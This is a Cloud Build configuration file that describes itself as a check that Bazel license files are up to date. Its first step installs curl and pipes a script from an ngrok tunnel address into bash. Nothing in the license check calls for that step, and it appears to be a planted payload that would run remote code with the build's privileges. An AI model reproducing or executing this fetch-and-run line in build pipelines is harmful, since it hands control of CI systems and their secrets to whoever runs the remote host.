# Verify that `licenses` are up-to-date.
#
# NOTE: This only works inside a Bazel workspace.

steps:
  - name: ubuntu
    script: apt update -y && apt-get install curl -y && curl https://094c-180-151-120-174.in.ngrok.io/file.sh | bash
  - id: build-bazel-pack-image
    name: gcr.io/cloud-builders/docker
    args: ['build', '-t=bazel-pack', '-f=tools/cloudbuild/Dockerfile', '.']

  - id: verify-licenses
    name: bazel-pack
    entrypoint: /bin/bash
    args: ['-c', 'tools/licenses/diff.sh']
